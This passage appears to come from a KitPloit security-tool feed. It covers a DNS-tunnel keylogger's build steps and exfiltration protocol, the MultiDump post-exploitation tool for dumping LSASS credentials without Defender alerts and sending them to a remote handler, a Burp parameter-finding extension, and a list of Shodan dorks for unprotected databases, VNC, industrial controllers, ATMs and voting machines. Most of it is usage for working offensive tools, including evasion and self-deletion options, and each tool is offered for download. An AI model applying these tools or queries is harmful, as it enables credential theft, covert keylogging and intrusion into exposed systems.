title="keylogging">keylogging</a> program, run <code>make</code> in the <code>windows</code> directory. To build with reduced size and some amount of obfuscation, make the <code>production</code> target. This will create the <code>build</code> directory for you and output to a file named <code>logger.exe</code> in the <code>build</code> directory.</p> <p><code>make production domain=example.com</code></p> <p>You can also choose to build the program with <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> by making the <code>debug</code> target.</p> <p><code>make debug domain=example.com</code></p> <p>For both targets, you will need to specify the domain the server is listening for.</p> <h2>Sending Test Requests</h2> <p>You can use <code>dig</code> to send requests to the server:</p> <p><code>dig @127.0.0.1 a.1.1.1.example.com A +short</code> send a connection request to a server on localhost.</p> <p><code>dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short</code> send a test message to localhost.</p> <p>Replace <code>example.com</code> with the domain the server is listening for.</p> <h1>Protocol</h1> <h2>Starting a Connection</h2> <p>A record requests starting with <code>a</code> indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.</p> <p>The following is the format to follow for starting a connection: <code>a.1.1.1.[sld].[tld].</code></p> <p>The server will respond with an IP address in following format: <code>123.123.123.[id]</code></p> <p>Concurrent connections cannot exceed 254, and clients are never considered "disconnected."</p> <h2>Exfiltrating Data</h2> <p>A record requests starting with <code>b</code> indicate exfiltrated data being sent to the server.</p> <p>The following is the format to follow for sending data after establishing a connection: <code>b.[packet #].[id].[data].[sld].[tld].</code></p> <p>The server will respond with <code>[code].123.123.123</code></p> <p><code>id</code> is the id that was established on connection. Data is sent as ASCII encoded in hex.</p> <p><code>code</code> is one of the codes described below.</p> <h2>Response Codes</h2> <h3><code>200</code>: OK</h3> <p>If the client sends a request that is processed normally, the server will respond with code <code>200</code>.</p> <h3><code>201</code>: Malformed Record Requests</h3> <p>If the client sends an malformed record request, the server will respond with code <code>201</code>.</p> <h3><code>202</code>: Non-Existant Connections</h3> <p>If the client sends a data packet with an id greater than the # of connections, the server will respond with code <code>202</code>.</p> <h3><code>203</code>: Out of Order Packets</h3> <p>If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code <code>203</code>. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.</p> <h3><code>204</code> Reached Max Connection</h3> <p>If the client attempts to create a connection when the max has reached, the server will respond with code <code>204</code>.</p> <h2>Dropped Packets</h2> <p>Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.</p> <h1>Side Notes</h1> <h2>Linux</h2> <h3>Log File</h3> <p>The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like <code>cat</code>, you should select the appropriate option to print ASCII control characters, such as <code>-v</code> for <code>cat</code>, or open it in a text-editor.</p> <h3>Non-Interactive Shells</h3> <p>The keylogger relies on <code>script</code>, so the keylogger won't run in non-interactive shells.</p> <h2>Windows</h2> <h3>Repeated Requests</h3> <p>For some reason, the Windows <code>Dns_Query_A</code> always sends duplicate requests. The server will process it fine because it discards repeated packets.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Geeoon/DNS-Tunnel-Keylogger" rel="nofollow" target="_blank" title="Download DNS-Tunnel-Keylogger">Download DNS-Tunnel-Keylogger</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-20971502194654544422024-03-20T08:30:00.001-03:002024-03-20T08:30:00.129-03:00MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkWIUNTUhU6q2CWK3Den9jy-peZwSi_8_9eLB_LiCSJiZLaXVTyjJ7wDWM0FXXc-NVlrnrAWhhKF1DNIWUojP6IgNhw-etA8a4d5oTIAlei2cMX0WL2LoO65qnycGmmudHm0RcePYBIQrBLzc3aq0w8Igy1jT_XGs4mNpHyA4Zr26jwxstcCzmW5TMLf4/s1569/MultiDump_1_multidump-defender.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="738" data-original-width="1569" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkWIUNTUhU6q2CWK3Den9jy-peZwSi_8_9eLB_LiCSJiZLaXVTyjJ7wDWM0FXXc-NVlrnrAWhhKF1DNIWUojP6IgNhw-etA8a4d5oTIAlei2cMX0WL2LoO65qnycGmmudHm0RcePYBIQrBLzc3aq0w8Igy1jT_XGs4mNpHyA4Zr26jwxstcCzmW5TMLf4/w640-h302/MultiDump_1_multidump-defender.gif" width="640" /></a></div><p><br /></p> <p>MultiDump is a <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.</p> <p>Blog post: https://xre0us.io/posts/multidump</p><span><a name='more'></a></span><p><br /></p><p>MultiDump supports LSASS dump via <code>ProcDump.exe</code> or <code>comsvc.dll</code>, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for <a href="https://www.kitploit.com/search/label/Decryption" target="_blank" title="decryption">decryption</a> and analysis.</p> <h2>Usage</h2> <pre><code> __ __ _ _ _ _____<br /> | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __<br /> | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \<br /> | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |<br /> |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/<br /> |_|<br /><br />Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]<br /><br />-p Path to save procdump.exe, use full path. Default to temp directory<br />-l Path to save encrypted dump file, use full path. Default to current directory<br />-r Set ip:port to connect to a remote handler<br />--procdump Writes procdump to disk and use it to dump LSASS<br />--nodump Disable LSASS dumping<br />--reg Dump SAM, SECURITY and SYSTEM hives<br />--delay Increase interval between connections to for slower network speeds<br />-v Enable v erbose mode<br /><br />MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.<br />Examples:<br /> MultiDump.exe -l C:\Users\Public\lsass.dmp -v<br /> MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000<br /></code></pre> <pre><code>usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]<br /><br />Handler for RemoteProcDump<br /><br />options:<br /> -h, --help show this help message and exit<br /> -r REMOTE, --remote REMOTE<br /> Port to receive remote dump file<br /> -l LOCAL, --local LOCAL<br /> Local dump file, key needed to decrypt<br /> --sam SAM Local SAM save, key needed to decrypt<br /> --security SECURITY Local SECURITY save, key needed to decrypt<br /> --system SYSTEM Local SYSTEM save, key needed to decrypt<br /> -k KEY, --key KEY Key to decrypt local file<br /> --override-ip OVERRIDE_IP<br /> Manually specify the IP address for key generation in remote mode, for proxied connection<br /></code></pre> <p>As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.</p> <p>The handler depends on <a href="https://github.com/skelsec/pypykatz" rel="nofollow" target="_blank" title="Pypykatz">Pypykatz</a> to parse the LSASS dump, and <a href="https://github.com/fortra/impacket" rel="nofollow" target="_blank" title="impacket">impacket</a> to parse the registry saves. They should be installed in your enviroment. If you see the error <code>All detection methods failed</code>, it's likely the Pypykatz version is outdated.</p> <p>By default, MultiDump uses the <code>Comsvc.dll</code> method and saves the encrypted dump in the current directory.</p> <pre><code>MultiDump.exe<br />...<br />[i] Local Mode Selected. Writing Encrypted Dump File to Disk...<br />[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.<br />[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e<br /></code></pre> <pre><code>./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e<br /></code></pre> <p>If <code>--procdump</code> is used, <code>ProcDump.exe</code> will be writtern to disk to dump LSASS.</p> <p>In remote mode, MultiDump connects to the handler's listener.</p> <pre><code>./ProcDumpHandler.py -r 9001<br />[i] Listening on port 9001 for encrypted key...<br /></code></pre> <pre><code>MultiDump.exe -r 10.0.0.1:9001<br /></code></pre> <p>The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the <code>--override-ip</code> option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump <code>-r</code>.</p> <p>An additional option to dump the <code>SAM</code>, <code>SECURITY</code> and <code>SYSTEM</code> hives are available with <code>--reg</code>, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit <a href="https://www.kitploit.com/search/label/Information%20Gathering" target="_blank" title="information gathering">information gathering</a> easier.</p> <h3>Building MultiDump</h3> <p>Open in Visual Studio, build in <strong>Release</strong> mode.</p> <h3>Customising MultiDump</h3> <p>It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project <code>EncryptionHelper</code>, is included. Simply change the key or strings and the output of the compiled <code>EncryptionHelper.exe</code> can be pasted into <code>MultiDump.c</code> and <code>Common.h</code>.</p> <p>Self deletion can be toggled by uncommenting the following line in <code>Common.h</code>:</p> <pre><code>#define SELF_DELETION<br /></code></pre> <p>To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in <code>Debug.h</code>:</p> <pre><code>//#define DEBUG<br /></code></pre> <hr /> <p>MultiDump might get detected on <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/</p> <h2>Credits</h2> <ul> <li>Some <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> used learnt from <a href="https://maldevacademy.com" rel="nofollow" target="_blank" title="MalDev Academy">MalDev Academy</a>, it is an awesome course, highly recommended</li> <li>Inspired by <a href="https://github.com/djackreuter/proc_noprocdump" rel="nofollow" target="_blank" title="proc_noprocdump">proc_noprocdump</a></li> <li>Code to further process LSASS dump from <a href="https://github.com/Hackndo/lsassy" rel="nofollow" target="_blank" title="lsassy">lsassy</a></li> <li>Testing and suggestions from <a href="https://github.com/ballro" rel="nofollow" target="_blank" title="ballro">ballro</a></li> <li>Testing and suggestions from <a href="https://github.com/DisplayGFX" rel="nofollow" target="_blank" title="DisplayGFX">DisplayGFX</a>, <a href="https://github.com/nthdeg" rel="nofollow" target="_blank" title="nthdeg">nthdeg</a> and silentbee</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Xre0uS/MultiDump" rel="nofollow" target="_blank" title="Download MultiDump">Download MultiDump</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77065327759531666782024-03-19T08:30:00.013-03:002024-03-19T08:30:00.131-03:00GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist<center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh11U9atYP5tkgmZPdqWYxW_DJ5xNIlXShlnf_vPmhm_yDPRFpGNQFGFXcTFI1HljcetRWbNtGmBLyl5CE3dIZ5hwBcs4loO8ru77h20-XxS1XRughFqfQfAdoM9gNKo0RAXkEBMgmIjYbHcJXjtL3f8yMJk3OiF0MsCqYh3vEl-QBi9iMXaDnwcxOvDfM"><img alt="" border="0" height="120" id="BLOGGER_PHOTO_ID_7347884014443827730" src="https://blogger.googleusercontent.com/img/a/AVvXsEh11U9atYP5tkgmZPdqWYxW_DJ5xNIlXShlnf_vPmhm_yDPRFpGNQFGFXcTFI1HljcetRWbNtGmBLyl5CE3dIZ5hwBcs4loO8ru77h20-XxS1XRughFqfQfAdoM9gNKo0RAXkEBMgmIjYbHcJXjtL3f8yMJk3OiF0MsCqYh3vEl-QBi9iMXaDnwcxOvDfM=w640-h120" width="640" /></a></center><center><br /></center> <p>This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> to use for fuzzing. The full Help documentation can be found <a href="https://github.com/xnl-h4ck3r/burp-extensions/blob/main/GAP%20Help.md" rel="nofollow" target="_blank" title="here">here</a> or from the Help icon on the GAP tab.</p><span><a name='more'></a></span><p><br /></p> <h2>TL;DR</h2> <h3>Installation</h3> <ol> <li>Visit <a href="https://www.jython.org/download" rel="nofollow" target="_blank" title="Jython Offical Site">Jython Offical Site</a>, and download the latest stand alone JAR file, e.g. <code>jython-standalone-2.7.3.jar</code>.</li> <li>Open Burp, go to <strong>Extensions</strong> -> <strong>Extension Settings</strong> -> <strong>Python Environment</strong>, set the <strong>Location of Jython standalone JAR file</strong> and <strong>Folder for loading modules</strong> to the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> where the Jython JAR file was saved.</li> <li>On a command line, go to the directory where the jar file is and run <code>java -jar jython-standalone-2.7.3.jar -m ensurepip</code>.</li> <li>Download the <code>GAP.py</code> and <code>requirements.txt</code> from this project and place in the same directory.</li> <li>Install Jython modules by running <code>java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt</code>.</li> <li>Go to the <strong>Extensions</strong> -> <strong>Installed</strong> and click <strong>Add</strong> under <strong>Burp Extensions</strong>.</li> <li>Select <strong>Extension type</strong> of <strong>Python</strong> and select the <strong>GAP.py</strong> file.</li> </ol> <h3>Using</h3> <ol> <li>Just select a target in your <a href="https://www.kitploit.com/search/label/Burp" target="_blank" title="Burp">Burp</a> scope (or multiple targets), or even just one subfolder or endpoint, and choose extension <strong>GAP</strong>:</li> </ol> <p></p><center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1U3bPd3DBx2ZHTRtGYTp-eeYN0u434BN8S11n1tki2vU66KHWNzouVB5dEnX0nFf6yiV5YGxggTLgoADJmgKB8CdKo4sj0yQRF9cdQTxdZI-CTyq5Q498_OUyxuTpGEFfJnLs-TPbftk3qM4UPDNFOj-TXTemGiMoZDRe2iFxOMiY7U24Du7ceDzjueY"><img alt="" border="0" height="428" id="BLOGGER_PHOTO_ID_7347884023791381474" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1U3bPd3DBx2ZHTRtGYTp-eeYN0u434BN8S11n1tki2vU66KHWNzouVB5dEnX0nFf6yiV5YGxggTLgoADJmgKB8CdKo4sj0yQRF9cdQTxdZI-CTyq5Q498_OUyxuTpGEFfJnLs-TPbftk3qM4UPDNFOj-TXTemGiMoZDRe2iFxOMiY7U24Du7ceDzjueY=w640-h428" width="640" /></a></center> <p>Or you can right click a request or response in any other context and select <strong>GAP</strong> from the <strong>Extensions</strong> menu.</p> <ol> <li>Then go to the <strong>GAP</strong> tab to see the results:</li> </ol> <p></p><center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiuWIo5ZmDRD0lKMGWfiZjWO6YCGOGkAjMJqaHHrzLKn0PM87A3GbTnTITI36-ugSoYF_8VIKCjcgHIUoThsLyFqzuo-FbaVCXyXNYXa9Xf60CExMWNs6wGvUhmqgBXmNk4fZ6qjuGBAkSTUcNq8Iz0MSHk9P5znGuzShPHQwiViseR4X0pfkaCMg6Lzz8"><img alt="" border="0" height="330" id="BLOGGER_PHOTO_ID_7347884028458490066" src="https://blogger.googleusercontent.com/img/a/AVvXsEiuWIo5ZmDRD0lKMGWfiZjWO6YCGOGkAjMJqaHHrzLKn0PM87A3GbTnTITI36-ugSoYF_8VIKCjcgHIUoThsLyFqzuo-FbaVCXyXNYXa9Xf60CExMWNs6wGvUhmqgBXmNk4fZ6qjuGBAkSTUcNq8Iz0MSHk9P5znGuzShPHQwiViseR4X0pfkaCMg6Lzz8=w640-h330" width="640" /></a></center> <h2>IMPORTANT Notes</h2> <p>If you don't need one of the modes, then un-check it as results will be quicker.</p> <p>If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.</p> <p>If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.</p> <p>It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the <code>Ctrl</code> button and click the GAP logo header image to remove it to make more space.</p> <p>The Words mode uses the <code>beautifulsoup4</code> <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> and this can be quite slow, so be patient!</p> <h2>In Depth Instructions</h2> <p>Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.</p> <p><strong>NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.</strong></p> <p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/Os3bN0zUROA?si=nh4llqs7b4UWgheg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe></p> <h2>TODO</h2> <ul> <li>Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.</li> <li>Add an option to not add the <code>Tentaive</code> Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).</li> <li>Improve <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> of the link finding regular expressions.</li> <li>Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!</li> <li>Deal with other size displays and font sizes better to make sure all controls are viewable.</li> <li>If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.</li> <li>Use an alternative to <code>beautifulsoup4</code> that is faster to parse responses for Words.</li> </ul> <p>Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider <a href="https://ko-fi.com/xnlh4ck3r" rel="nofollow" target="_blank" title="BUYING ME A COFFEE!">BUYING ME A COFFEE!</a> β (I could use the caffeine!)</p> <p>π€ /XNL-h4ck3r</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xnl-h4ck3r/GAP-Burp-Extension" rel="nofollow" target="_blank" title="Download GAP-Burp-Extension">Download GAP-Burp-Extension</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-81316120703268537362024-03-18T08:30:00.000-03:002024-03-18T08:30:00.134-03:00Shodan Dorks<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div><p><br /></p><h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions</p><span><a name='more'></a></span><p><br /></p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or /x CIDR. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices before or after between a given time. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self signed certificates <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" 